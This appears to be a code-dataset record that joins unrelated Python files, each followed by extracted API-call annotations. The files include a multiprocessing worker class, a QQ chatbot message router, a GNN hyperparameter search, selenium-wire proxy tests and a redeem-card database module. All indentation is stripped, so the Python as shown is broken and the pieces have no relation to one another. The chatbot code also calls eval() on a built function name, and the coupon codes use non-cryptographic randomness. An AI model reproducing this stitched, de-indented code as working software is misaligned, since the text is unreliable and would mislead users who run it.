def __repr__(self):
return f'{self.__class__.__name__}[{self.pid}]'
def __enter__(self):
if not self.is_alive():
self.start()
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.join()
def __del__(self):
if self.verbose: print(f'{self}.__del__ was called!')
self.terminate(check_alive=False)
############### Main interface methods ###############
def poll(self) -> bool:
'''Check if worker sent anything.
'''
return self.pipe.poll()
def execute(self, data: Any):
'''Send data to worker and blocking return result upon reception.
'''
self.send_data(data)
return self.recv_data()
def recv_data(self) -> Any:
'''Receive raw data from user function.'''
return self.recv().data
def send_data(self, data: Any, **kwargs) -> None:
'''Send any data to worker process to be handled by user function.'''
return self.send_payload(DataPayload(data, **kwargs))
def update_userfunc(self, func: Callable, *args, **kwargs):
'''Send a new UserFunc to worker process.
'''
return self.send_payload(UserFunc(func, *args, **kwargs))
def get_status(self):
'''Blocking request status update from worker.
'''
self.send_payload(StatusRequest())
return self.recv()
############### Pipe interface ###############
def send_payload(self, payload: BaseMessage) -> None:
'''Send a Message (DataPayload or otherwise) to worker process.
'''
if not self.proc.is_alive():
raise WorkerIsDeadError('.send_payload()', self.proc.pid)
if self.verbose: print(f'{self} sending: {payload}')
try:
return self.pipe.send(payload)
except BrokenPipeError:
raise WorkerDiedError(self.proc.pid)
def recv(self) -> DataPayload:
'''Return received DataPayload or raise exception.
'''
try:
payload = self.pipe.recv()
if self.verbose: print(f'{self} received: {payload}')
except (BrokenPipeError, EOFError, ConnectionResetError):
if self.verbose: print('caught one of (BrokenPipeError, EOFError, ConnectionResetError)')
raise WorkerDiedError(self.proc.pid)
# handle incoming data
if isinstance(payload, DataPayload) or isinstance(payload, WorkerStatus):
return payload
elif isinstance(payload, WorkerError):
#self.terminate(check_alive=True)
raise payload.e
elif isinstance(payload, UserFuncException):
raise UserFuncRaisedException(payload.e)
else:
raise WorkerResourceReceivedUnidentifiedMessage()
############### Process interface ###############
@property
def pid(self):
'''Get process id from worker.'''
return self.proc.pid
def is_alive(self, *arsg, **kwargs):
'''Get status of process.'''
return self.proc.is_alive(*arsg, **kwargs)
def start(self):
'''Start the process, throws WorkerIsAliveError if already alive.'''
if self.proc.is_alive():
raise WorkerIsAliveError('.start()', self.proc.pid)
return self.proc.start()
def join(self, check_alive=True):
'''Send SigClose() to Worker and then wait for it to die.'''
if check_alive and not self.proc.is_alive():
raise WorkerIsDeadError('.join()', self.proc.pid)
try:
self.pipe.send(SigClose())
except BrokenPipeError:
pass
return self.proc.join()
def terminate(self, check_alive=True):
'''Send terminate signal to worker.'''
if check_alive and not self.proc.is_alive():
raise WorkerIsDeadError('.terminate()', self.proc.pid)
return self.proc.terminate()
#class WorkerPool(list):
#
# ############### Worker Creation ###############
# def is_alive(self):
# return len(self) > 0 and all([w.is_alive() for w in self])
#
# def start(self, num_workers: int, *args, func: Callable = None, **kwargs):
# if self.is_alive():
# raise ValueError('This WorkerPool already has running workers.')
#
# # start each worker
# for ind in range(num_workers):
# self.append(WorkerResource(ind, *args, func=func, **kwargs))
#
# return self
#
# def update_userfunc(self, userfunc: Callable):
# return [w.update_userfunc(userfunc) for w in self]
#
# ############### Low-Level Process Operations ###############
# def join(self):
# [w.join() for w in self]
# self.clear()
#
# def terminate(self):
# [w.terminate() for w in self]
# self.clear()
| [
"multiprocessing.get_context",
"multiprocessing.Pipe"
] | [((1277, 1312), 'multiprocessing.get_context', 'multiprocessing.get_context', (['method'], {}), '(method)\n', (1304, 1312), False, 'import multiprocessing\n'), ((1346, 1363), 'multiprocessing.Pipe', 'Pipe', ([], {'duplex': '(True)'}), '(duplex=True)\n', (1350, 1363), False, 'from multiprocessing import Lock, Pipe, Pool, Process, Value\n')] |
import click
from guniflask_cli import __version__
@click.group()
def cli_version():
pass
@cli_version.command('version')
def main():
"""
Print the version.
"""
Version().run()
class Version:
def run(self):
print(f" guniflask-cli: v{__version__}")
import guniflask
print(f" guniflask: v{guniflask.__version__}")
| [
"click.group"
] | [((55, 68), 'click.group', 'click.group', ([], {}), '()\n', (66, 68), False, 'import click\n')] |
import torch
# the copy model returns the identity,
# this is its own class so we dont have to change the code to use the copymodel
class CopyEnvModel(torch.nn.Module):
def __init__(self):
super(CopyEnvModel, self).__init__()
def forward(self, input_frame, input_action):
return input_frame, torch.zeros(input_frame.shape[0]).cuda() | [
"torch.zeros"
] | [((317, 350), 'torch.zeros', 'torch.zeros', (['input_frame.shape[0]'], {}), '(input_frame.shape[0])\n', (328, 350), False, 'import torch\n')] |
from nonebot import CommandSession, on_command
from nonebot import on_natural_language, NLPSession, IntentCommand
from ....requests import Request
from ....responses import *
from ....distributor import Distributor
from ....utils import image_url_to_path
from ....paths import PATHS
import os, logging, traceback
# BLACKLIST = [3288849221]
BLACKLIST = []
@on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True)
async def _(session: NLPSession):
return IntentCommand(100.0, 'porter', args={'message': session.msg_text})
@on_command('porter')
async def porter(session: CommandSession):
logging.debug('=========== [MultiBot] Entered nonebot porter ==========')
# 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列
# Resqust打包
request = Request()
request.platform = 'CQ'
request.user_id = str(session.ctx['user_id'])
self_id = str(session.self_id)
self_names = ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像']
bot_called = False
if request.user_id == self_id:
logging.debug('=========== [MultiBot] Left nonebot porter ==========')
return
elif request.user_id in BLACKLIST:
logging.debug('=========== [MultiBot] Left nonebot porter ==========')
return
if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']:
# 被at时
bot_called = True
if 'group_id' in session.ctx.keys():
request.group_id = str(session.ctx['group_id'])
else:
# 私聊时
bot_called = True
for message in session.ctx['message']:
if message['type'] == 'text' and request.msg is None:
text = message['data']['text'].strip()
# 呼叫检测
for name in self_names:
if name in text:
# 被叫到时
bot_called = True
text = text.strip()
while text[:len(name)] == name:
text = text[len(name):]
while text[-len(name):] == name:
text = text[:-len(name)]
for sign in [None, ',', ',', None]:
text = text.strip(sign)
# 消息段检测
if '请使用' in text and '新版手机QQ' in text:
request.echo = True
request.msg = '【NonebotPorter】不支持的消息段:"%s"' % text
continue
# 空文本检测
if text != '':
request.msg = text
elif message['type'] == 'image' and request.img is None:
# 先不下载图片,获取response时下载
request.img = message['data']['url']
# request.img = image_url_to_path(message['data']['url'], header='QQBot')
elif message['type'] == 'record' and request.aud is None:
request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file'])
elif message['type'] == 'location':
request.loc = {'longitude': float(message['data']['lon']),
'latitude': float(message['data']['lat'])}
elif message['type'] not in ['face', 'at', 'anonymous', 'share', 'reply']:
request.echo = True
request.msg = f"【NonebotPorter】不支持的消息段[{message['type']}]:" \
f"{str(message).replace('CQ:', '$CQ$:')}"
continue
# 初始化分拣中心
distributor = Distributor()
# 获取Response序列,同时下载图片,若出错则返回错误信息
def get_responses():
if request.img:
request.img = image_url_to_path(request.img, header='QQBot')
response_list = distributor.handle(request=request)
return response_list
# 用于执行Response序列
async def execute(response_list: list):
for response in response_list:
try:
if isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg):
msg = response.text
for at_id in response.at_list:
msg += '[CQ:at,qq=%s]' % str(at_id)
# 过长文本多次发送
max_length = 2000
while len(msg) > 0:
msg_left = msg[max_length:] # msg超出maxL的部分
msg = msg[:max_length] # msg只保留maxL内的部分
if isinstance(response, ResponseMsg): # 私聊
await session.send(message=msg)
else: # 群消息
await session.bot.send_group_msg(group_id=response.group_id, message=msg)
if msg_left != '': # 这轮超出部分为0时
msg = msg_left
else:
msg = ''
elif isinstance(response, ResponseMusic):
await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]')
elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg):
# 需要在盘符之后加入一个反斜杠,并且不使用双引号
img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\')
if isinstance(response, ResponseImg):
await session.send(message=img_msg)
else:
await session.bot.send_group_msg(group_id=response.group_id, message=img_msg)
elif isinstance(response, ResponseCQFunc):
try:
output = await eval('session.bot.%s' % response.func_name)(**response.kwargs)
except AttributeError:
await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name)
except TypeError:
await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs))
except SyntaxError:
await session.send('【NonebotPorter】语法错误')
else:
await execute(distributor.process_output(output=output)) # 递归处理新的Response序列
except:
# 诸如发送失败等问题
logging.error(traceback.format_exc())
# 在筛选后,把Request交给分拣中心,执行返回的Response序列
if bot_called:
# 符合呼出条件的,直接执行
await execute(response_list=get_responses())
elif distributor.use_active(request=request, save=False):
# 不符合呼出条件的,若有活动Session对应,也可以执行
await execute(response_list=get_responses())
else:
logging.debug('=========== [MultiBot] Left nonebot porter ==========')
return
# 刷新并保存最新的session信息
distributor.refresh_and_save()
logging.debug('=========== [MultiBot] Completed nonebot porter ==========')
| [
"nonebot.on_command",
"os.path.abspath",
"logging.debug",
"nonebot.IntentCommand",
"traceback.format_exc",
"os.path.join",
"nonebot.on_natural_language"
] | [((372, 465), 'nonebot.on_natural_language', 'on_natural_language', ([], {'only_to_me': '(False)', 'only_short_message': '(False)', 'allow_empty_message': '(True)'}), '(only_to_me=False, only_short_message=False,\n allow_empty_message=True)\n', (391, 465), False, 'from nonebot import on_natural_language, NLPSession, IntentCommand\n'), ((582, 602), 'nonebot.on_command', 'on_command', (['"""porter"""'], {}), "('porter')\n", (592, 602), False, 'from nonebot import CommandSession, on_command\n'), ((509, 575), 'nonebot.IntentCommand', 'IntentCommand', (['(100.0)', '"""porter"""'], {'args': "{'message': session.msg_text}"}), "(100.0, 'porter', args={'message': session.msg_text})\n", (522, 575), False, 'from nonebot import on_natural_language, NLPSession, IntentCommand\n'), ((652, 725), 'logging.debug', 'logging.debug', (['"""=========== [MultiBot] Entered nonebot porter =========="""'], {}), "('=========== [MultiBot] Entered nonebot porter ==========')\n", (665, 725), False, 'import os, logging, traceback\n'), ((6755, 6830), 'logging.debug', 'logging.debug', (['"""=========== [MultiBot] Completed nonebot porter =========="""'], {}), "('=========== [MultiBot] Completed nonebot porter ==========')\n", (6768, 6830), False, 'import os, logging, traceback\n'), ((1088, 1158), 'logging.debug', 'logging.debug', (['"""=========== [MultiBot] Left nonebot porter =========="""'], {}), "('=========== [MultiBot] Left nonebot porter ==========')\n", (1101, 1158), False, 'import os, logging, traceback\n'), ((1224, 1294), 'logging.debug', 'logging.debug', (['"""=========== [MultiBot] Left nonebot porter =========="""'], {}), "('=========== [MultiBot] Left nonebot porter ==========')\n", (1237, 1294), False, 'import os, logging, traceback\n'), ((6598, 6668), 'logging.debug', 'logging.debug', (['"""=========== [MultiBot] Left nonebot porter =========="""'], {}), "('=========== [MultiBot] Left nonebot porter ==========')\n", (6611, 6668), False, 'import os, logging, traceback\n'), ((2881, 2953), 'os.path.join', 'os.path.join', (["PATHS['cqhttp']", '"""data"""', '"""voices"""', "message['data']['file']"], {}), "(PATHS['cqhttp'], 'data', 'voices', message['data']['file'])\n", (2893, 2953), False, 'import os, logging, traceback\n'), ((6254, 6276), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (6274, 6276), False, 'import os, logging, traceback\n'), ((5175, 5205), 'os.path.abspath', 'os.path.abspath', (['response.file'], {}), '(response.file)\n', (5190, 5205), False, 'import os, logging, traceback\n')] |
import os
import subprocess
import sys
import tempfile
import threading
import time
here = os.path.abspath(os.path.dirname(__file__))
class TestApp(threading.Thread):
name = None
args = None
stdin = None
daemon = True
def __init__(self):
super(TestApp, self).__init__()
self.exitcode = None
self.process = None
self.tmpfile = None
self.tmpsize = 0
self.response = None
self.stdout, self.stderr = b'', b''
def start(self, name, args):
self.name = name
self.args = args or []
fd, self.tmpfile = tempfile.mkstemp()
os.close(fd)
touch(self.tmpfile)
self.tmpsize = os.path.getsize(self.tmpfile)
self.response = readfile(self.tmpfile)
super(TestApp, self).start()
def run(self):
cmd = [sys.executable, '-m', 'tests.' + self.name]
if self.tmpfile:
cmd += ['--callback-file', self.tmpfile]
cmd += self.args
env = os.environ.copy()
env['PYTHONUNBUFFERED'] = '1'
self.process = subprocess.Popen(
cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
universal_newlines=True,
)
try:
self.stdout, self.stderr = self.process.communicate(self.stdin)
finally:
self.exitcode = self.process.wait()
def is_alive(self):
return self.process is not None and self.exitcode is None
def stop(self):
if self.is_alive():
self.process.terminate()
self.join()
if self.tmpfile:
os.unlink(self.tmpfile)
self.tmpfile = None
def wait_for_response(self, timeout=5, interval=0.1):
self.tmpsize = wait_for_change(
self.tmpfile,
last_size=self.tmpsize,
timeout=timeout,
interval=interval,
)
self.response = readfile(self.tmpfile)
def touch(fname, times=None):
with open(fname, 'a'):
os.utime(fname, times)
def readfile(path):
with open(path, 'rb') as fp:
return fp.readlines()
def wait_for_change(path, last_size=0, timeout=5, interval=0.1):
start = time.time()
size = os.path.getsize(path)
while size == last_size:
duration = time.time() - start
sleepfor = interval
if timeout is not None: # pragma: no cover
if duration >= timeout:
raise RuntimeError(
'timeout waiting for change to file=%s' % (path,))
sleepfor = min(timeout - duration, sleepfor)
time.sleep(sleepfor)
size = os.path.getsize(path)
return size
| [
"subprocess.Popen",
"os.unlink",
"tempfile.mkstemp",
"os.path.getsize",
"os.path.dirname",
"os.environ.copy",
"time.time",
"time.sleep",
"os.close",
"os.utime"
] | [((108, 133), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (123, 133), False, 'import os\n'), ((2272, 2283), 'time.time', 'time.time', ([], {}), '()\n', (2281, 2283), False, 'import time\n'), ((2295, 2316), 'os.path.getsize', 'os.path.getsize', (['path'], {}), '(path)\n', (2310, 2316), False, 'import os\n'), ((603, 621), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {}), '()\n', (619, 621), False, 'import tempfile\n'), ((630, 642), 'os.close', 'os.close', (['fd'], {}), '(fd)\n', (638, 642), False, 'import os\n'), ((694, 723), 'os.path.getsize', 'os.path.getsize', (['self.tmpfile'], {}), '(self.tmpfile)\n', (709, 723), False, 'import os\n'), ((1005, 1022), 'os.environ.copy', 'os.environ.copy', ([], {}), '()\n', (1020, 1022), False, 'import os\n'), ((1085, 1216), 'subprocess.Popen', 'subprocess.Popen', (['cmd'], {'stdin': 'subprocess.PIPE', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'env': 'env', 'universal_newlines': '(True)'}), '(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr\n =subprocess.PIPE, env=env, universal_newlines=True)\n', (1101, 1216), False, 'import subprocess\n'), ((2085, 2107), 'os.utime', 'os.utime', (['fname', 'times'], {}), '(fname, times)\n', (2093, 2107), False, 'import os\n'), ((2673, 2693), 'time.sleep', 'time.sleep', (['sleepfor'], {}), '(sleepfor)\n', (2683, 2693), False, 'import time\n'), ((2709, 2730), 'os.path.getsize', 'os.path.getsize', (['path'], {}), '(path)\n', (2724, 2730), False, 'import os\n'), ((1684, 1707), 'os.unlink', 'os.unlink', (['self.tmpfile'], {}), '(self.tmpfile)\n', (1693, 1707), False, 'import os\n'), ((2365, 2376), 'time.time', 'time.time', ([], {}), '()\n', (2374, 2376), False, 'import time\n')] |
import os
from data_loader.data_generator import DataGenerator
from models.invariant_basic import invariant_basic
from trainers.trainer import Trainer
from Utils.config import process_config
from Utils.dirs import create_dirs
from Utils import doc_utils
from Utils.utils import get_args
from data_loader import data_helper as helper
# capture the config path from the run arguments
# then process the json configuration file
config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json')
os.environ["CUDA_VISIBLE_DEVICES"] = config.gpu
import tensorflow.compat.v1 as tf
import numpy as np
tf.set_random_seed(1)
base_summary_folder = config.summary_dir
base_exp_name = config.exp_name
# create the experiments dirs
create_dirs([config.summary_dir, config.checkpoint_dir])
data = DataGenerator(config)
for lr in [0.00008*(2**i) for i in range(2,8)]:
for a1d in [[5],[10]]:
for a3d in [[5], [10],[15]]:
for fully in [[50,50],[20,20]]:
config.learning_rate = lr
config.architecture2d = a1d
config.architecture = a3d
config.fc = fully
config.exp_name = base_exp_name + " lr={0}_a2d={1}_a3d = {2}_fc = {3}".format(lr, a1d,a3d,fully)
curr_dir = os.path.join(base_summary_folder, "lr={0}_a2d={1}_a3d = {2}_fc = {3}".format(lr, a1d, a3d, fully))
config.summary_dir = curr_dir
create_dirs([curr_dir])
# create your data generator
data.config.learning_rate=lr
data.config.architecture2d = a1d
data.config.architecture3d = a3d
data.config.fc = fully
gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)
gpuconfig.gpu_options.visible_device_list = config.gpus_list
gpuconfig.gpu_options.allow_growth = True
sess = tf.Session(config=gpuconfig)
# create an instance of the model you want
model = invariant_basic(config, data)
# create trainer and pass all the previous components to it
trainer = Trainer(sess, model, data, config)
# here you train your model
acc, loss, _ = trainer.train()
sess.close()
tf.reset_default_graph()
import pandas as pd
def summary_10fold_results(summary_dir):
df = pd.read_csv(summary_dir+"/per_epoch_stats.csv")
acc = np.array(df["val_accuracy"])
print("Results")
print("Mean Accuracy = {0}".format(np.mean(acc)))
# print("Mean std = {0}".format(np.std(acc)))
return np.mean(acc)
| [
"Utils.dirs.create_dirs",
"Utils.config.process_config",
"pandas.read_csv",
"tensorflow.compat.v1.set_random_seed",
"tensorflow.compat.v1.Session",
"tensorflow.compat.v1.reset_default_graph",
"numpy.mean",
"data_loader.data_generator.DataGenerator",
"numpy.array",
"tensorflow.compat.v1.ConfigProto",
"models.invariant_basic.invariant_basic",
"trainers.trainer.Trainer"
] | [((434, 547), 'Utils.config.process_config', 'process_config', (['"""/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json"""'], {}), "(\n '/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json'\n )\n", (448, 547), False, 'from Utils.config import process_config\n'), ((640, 661), 'tensorflow.compat.v1.set_random_seed', 'tf.set_random_seed', (['(1)'], {}), '(1)\n', (658, 661), True, 'import tensorflow.compat.v1 as tf\n'), ((765, 821), 'Utils.dirs.create_dirs', 'create_dirs', (['[config.summary_dir, config.checkpoint_dir]'], {}), '([config.summary_dir, config.checkpoint_dir])\n', (776, 821), False, 'from Utils.dirs import create_dirs\n'), ((829, 850), 'data_loader.data_generator.DataGenerator', 'DataGenerator', (['config'], {}), '(config)\n', (842, 850), False, 'from data_loader.data_generator import DataGenerator\n'), ((2389, 2438), 'pandas.read_csv', 'pd.read_csv', (["(summary_dir + '/per_epoch_stats.csv')"], {}), "(summary_dir + '/per_epoch_stats.csv')\n", (2400, 2438), True, 'import pandas as pd\n'), ((2447, 2475), 'numpy.array', 'np.array', (["df['val_accuracy']"], {}), "(df['val_accuracy'])\n", (2455, 2475), True, 'import numpy as np\n'), ((2611, 2623), 'numpy.mean', 'np.mean', (['acc'], {}), '(acc)\n', (2618, 2623), True, 'import numpy as np\n'), ((2536, 2548), 'numpy.mean', 'np.mean', (['acc'], {}), '(acc)\n', (2543, 2548), True, 'import numpy as np\n'), ((1438, 1461), 'Utils.dirs.create_dirs', 'create_dirs', (['[curr_dir]'], {}), '([curr_dir])\n', (1449, 1461), False, 'from Utils.dirs import create_dirs\n'), ((1693, 1762), 'tensorflow.compat.v1.ConfigProto', 'tf.ConfigProto', ([], {'allow_soft_placement': '(True)', 'log_device_placement': '(False)'}), '(allow_soft_placement=True, log_device_placement=False)\n', (1707, 1762), True, 'import tensorflow.compat.v1 as tf\n'), ((1909, 1937), 'tensorflow.compat.v1.Session', 'tf.Session', ([], {'config': 'gpuconfig'}), '(config=gpuconfig)\n', (1919, 1937), True, 'import tensorflow.compat.v1 as tf\n'), ((2013, 2042), 'models.invariant_basic.invariant_basic', 'invariant_basic', (['config', 'data'], {}), '(config, data)\n', (2028, 2042), False, 'from models.invariant_basic import invariant_basic\n'), ((2137, 2171), 'trainers.trainer.Trainer', 'Trainer', (['sess', 'model', 'data', 'config'], {}), '(sess, model, data, config)\n', (2144, 2171), False, 'from trainers.trainer import Trainer\n'), ((2292, 2316), 'tensorflow.compat.v1.reset_default_graph', 'tf.reset_default_graph', ([], {}), '()\n', (2314, 2316), True, 'import tensorflow.compat.v1 as tf\n')] |
import contextlib
import os
from unittest import TestCase
from seleniumwire.proxy.utils import get_upstream_proxy
class GetUpstreamProxyTest(TestCase):
def test_get_config(self):
options = {
'proxy': {
'http': 'http://username1:password1@server1:8888',
'https': 'https://username2:password2@server2:8888',
'no_proxy': 'localhost'
}
}
proxy = get_upstream_proxy(options)
http = proxy['http']
self.assertEqual('http', http.scheme)
self.assertEqual('username1', http.username)
self.assertEqual('password1', http.password)
self.assertEqual('server1:8888', http.hostport)
https = proxy['https']
self.assertEqual('https', https.scheme)
self.assertEqual('username2', https.username)
self.assertEqual('password2', https.password)
self.assertEqual('server2:8888', https.hostport)
self.assertEqual('localhost', proxy['no_proxy'])
def test_get_from_env(self):
with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888',
HTTPS_PROXY='https://username2:password2@server2:8888',
NO_PROXY='localhost'):
proxy = get_upstream_proxy({})
http = proxy['http']
self.assertEqual('http', http.scheme)
self.assertEqual('username1', http.username)
self.assertEqual('password1', http.password)
self.assertEqual('server1:8888', http.hostport)
https = proxy['https']
self.assertEqual('https', https.scheme)
self.assertEqual('username2', https.username)
self.assertEqual('password2', https.password)
self.assertEqual('server2:8888', https.hostport)
self.assertEqual('localhost', proxy['no_proxy'])
def test_merge(self):
options = {
'proxy': {
'https': 'https://username3:password3@server3:8888',
'no_proxy': 'localhost'
}
}
with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888',
HTTPS_PROXY='https://username2:password2@server2:8888',
NO_PROXY='127.0.0.1'):
proxy = get_upstream_proxy(options)
http = proxy['http']
self.assertEqual('http', http.scheme)
self.assertEqual('username1', http.username)
self.assertEqual('password1', http.password)
self.assertEqual('server1:8888', http.hostport)
# The dict config overrides that defined in env variables
https = proxy['https']
self.assertEqual('https', https.scheme)
self.assertEqual('username3', https.username)
self.assertEqual('password3', https.password)
self.assertEqual('server3:8888', https.hostport)
self.assertEqual('localhost', proxy['no_proxy'])
def test_none(self):
options = None
proxy = get_upstream_proxy(options)
self.assertEqual({}, proxy)
@contextlib.contextmanager
def set_env(self, **environ):
"""Context manager used to temporarily set environment vars."""
old_environ = dict(os.environ)
os.environ.update(environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(old_environ)
| [
"seleniumwire.proxy.utils.get_upstream_proxy",
"os.environ.update",
"os.environ.clear"
] | [((447, 474), 'seleniumwire.proxy.utils.get_upstream_proxy', 'get_upstream_proxy', (['options'], {}), '(options)\n', (465, 474), False, 'from seleniumwire.proxy.utils import get_upstream_proxy\n'), ((3075, 3102), 'seleniumwire.proxy.utils.get_upstream_proxy', 'get_upstream_proxy', (['options'], {}), '(options)\n', (3093, 3102), False, 'from seleniumwire.proxy.utils import get_upstream_proxy\n'), ((3325, 3351), 'os.environ.update', 'os.environ.update', (['environ'], {}), '(environ)\n', (3342, 3351), False, 'import os\n'), ((1282, 1304), 'seleniumwire.proxy.utils.get_upstream_proxy', 'get_upstream_proxy', (['{}'], {}), '({})\n', (1300, 1304), False, 'from seleniumwire.proxy.utils import get_upstream_proxy\n'), ((2326, 2353), 'seleniumwire.proxy.utils.get_upstream_proxy', 'get_upstream_proxy', (['options'], {}), '(options)\n', (2344, 2353), False, 'from seleniumwire.proxy.utils import get_upstream_proxy\n'), ((3412, 3430), 'os.environ.clear', 'os.environ.clear', ([], {}), '()\n', (3428, 3430), False, 'import os\n'), ((3443, 3473), 'os.environ.update', 'os.environ.update', (['old_environ'], {}), '(old_environ)\n', (3460, 3473), False, 'import os\n')] |
import torch
import torch.nn as nn
class DenseOmega(nn.Module):
"""
Dense (+symmetric) Omega matrix
which applies to vectorized state with shape (batch, c, n, 1).
"""
def __init__(self, n, c):
super(DenseOmega, self).__init__()
self.n = n
self.c = c
# self.fc should have bias=False
# but this does not have an effect due to the custom forward pass below
# the bug was not fixed to maintain compatibility with older model checkpoints
self.fc = nn.Linear(n*c, n*c)
def forward(self, v):
batch = v.shape[0]
x = v.reshape((batch, self.c*self.n, 1))
y1 = torch.matmul(self.fc.weight, x)
y2 = torch.matmul(self.fc.weight.t(), x)
return 0.5*(y1+y2).reshape((batch, self.c, self.n, 1))
def dense_matrix(self):
return 0.5*(self.fc.weight + self.fc.weight.t()) | [
"torch.matmul",
"torch.nn.Linear"
] | [((522, 545), 'torch.nn.Linear', 'nn.Linear', (['(n * c)', '(n * c)'], {}), '(n * c, n * c)\n', (531, 545), True, 'import torch.nn as nn\n'), ((662, 693), 'torch.matmul', 'torch.matmul', (['self.fc.weight', 'x'], {}), '(self.fc.weight, x)\n', (674, 693), False, 'import torch\n')] |
from models.DAO import DAO
from utils.exception import ValidationError
from utils.validation import is_money
from models.shared import find_user
import string
from random import randint
# Prepare the char set for the coupon code
# Modify the char set according to your needs
# The char set contains all upper case letters and 0 to 9
char_set = list(string.ascii_uppercase)
[char_set.append(n) for n in range(0, 10)]
def generate_random_coupon_code():
# Generate a coupon code of length 16
return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in range(0, 16)])
def add_redeem_cards(value, batch = 1):
# Clean the input data
value = str(value).strip()
batch = str(batch).strip()
# Check is the input valid
if not is_money(value) or not batch.isdecimal():
raise ValidationError('Invalid input type.')
# Establish db connection
dao = DAO()
cursor = dao.cursor()
sql = """INSERT INTO redeem_card (
redeem_code,
value
) VALUES (
%(redeem_code)s,
%(value)s
)"""
for i in range(int(batch)):
cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value})
# Commit every 10 writes
if (i + 1) % 10 == 0:
dao.commit()
dao.commit()
def delete_redeem_card(redeem_code):
# Clean the input data
redeem_code = str(redeem_code).strip()
# Establish db connection
dao = DAO()
cursor = dao.cursor()
# Check if the redeem card exists
if find_redeem_card(redeem_code) is None:
raise ValidationError('The redeem card does not exists.')
sql = """DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s"""
cursor.execute(sql, {'redeem_code': redeem_code})
dao.commit()
def find_redeem_card(redeem_code):
# Clean the input data
param = str(redeem_code).strip()
# Establish db connection
dao = DAO()
cursor = dao.cursor()
# Query database
sql = """SELECT * FROM redeem_card WHERE redeem_code = %(redeem_code)s"""
cursor.execute(sql, {'redeem_code': redeem_code})
result = cursor.fetchone()
return result
def get_redeem_cards(limit = 0, offset = 0):
# Clean the input data
limit = str(limit).strip()
offset = str(offset).strip()
if not limit.isdecimal() or not offset.isdecimal():
raise ValidationError('IInvalid pagination parameters.')
# Establish db connection
dao = DAO()
cursor = dao.cursor()
# Query database
sql = """SELECT * FROM redeem_card ORDER BY redeem_code ASC"""
if not int(limit) == 0:
sql += ' LIMIT ' + limit + ' OFFSET ' + offset
cursor.execute(sql)
result = cursor.fetchall()
return result
def redeem(user_id, redeem_code):
# Clean the input data
user_id = str(user_id).strip()
redeem_code = str(redeem_code).strip()
# Find redeem card
redeem_card = find_redeem_card(redeem_code)
if redeem_card is None:
raise ValidationError('Invalid redeen code.')
# Find user
user = find_user(method = 'id', param = user_id)
if user is None:
raise ValidationError('user not found.')
# Establish db connection
dao = DAO()
cursor = dao.cursor()
sql = """UPDATE user SET balance = %(new_balance)s WHERE user_id = %(user_id)s"""
new_balance = user['balance'] + redeem_card['value']
cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id})
sql = """DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s"""
cursor.execute(sql, {'redeem_code': redeem_code})
dao.commit()
def count_records_length():
# Establish db connection
dao = DAO()
cursor = dao.cursor()
# Query database
sql = """SELECT count(redeem_code) as len FROM redeem_card"""
cursor.execute(sql)
length = cursor.fetchone()['len']
return length | [
"models.shared.find_user",
"models.DAO.DAO",
"utils.exception.ValidationError",
"utils.validation.is_money"
] | [((892, 897), 'models.DAO.DAO', 'DAO', ([], {}), '()\n', (895, 897), False, 'from models.DAO import DAO\n'), ((1444, 1449), 'models.DAO.DAO', 'DAO', ([], {}), '()\n', (1447, 1449), False, 'from models.DAO import DAO\n'), ((1917, 1922), 'models.DAO.DAO', 'DAO', ([], {}), '()\n', (1920, 1922), False, 'from models.DAO import DAO\n'), ((2452, 2457), 'models.DAO.DAO', 'DAO', ([], {}), '()\n', (2455, 2457), False, 'from models.DAO import DAO\n'), ((3051, 3088), 'models.shared.find_user', 'find_user', ([], {'method': '"""id"""', 'param': 'user_id'}), "(method='id', param=user_id)\n", (3060, 3088), False, 'from models.shared import find_user\n'), ((3204, 3209), 'models.DAO.DAO', 'DAO', ([], {}), '()\n', (3207, 3209), False, 'from models.DAO import DAO\n'), ((3670, 3675), 'models.DAO.DAO', 'DAO', ([], {}), '()\n', (3673, 3675), False, 'from models.DAO import DAO\n'), ((812, 850), 'utils.exception.ValidationError', 'ValidationError', (['"""Invalid input type."""'], {}), "('Invalid input type.')\n", (827, 850), False, 'from utils.exception import ValidationError\n'), ((1575, 1626), 'utils.exception.ValidationError', 'ValidationError', (['"""The redeem card does not exists."""'], {}), "('The redeem card does not exists.')\n", (1590, 1626), False, 'from utils.exception import ValidationError\n'), ((2360, 2410), 'utils.exception.ValidationError', 'ValidationError', (['"""IInvalid pagination parameters."""'], {}), "('IInvalid pagination parameters.')\n", (2375, 2410), False, 'from utils.exception import ValidationError\n'), ((2983, 3022), 'utils.exception.ValidationError', 'ValidationError', (['"""Invalid redeen code."""'], {}), "('Invalid redeen code.')\n", (2998, 3022), False, 'from utils.exception import ValidationError\n'), ((3128, 3162), 'utils.exception.ValidationError', 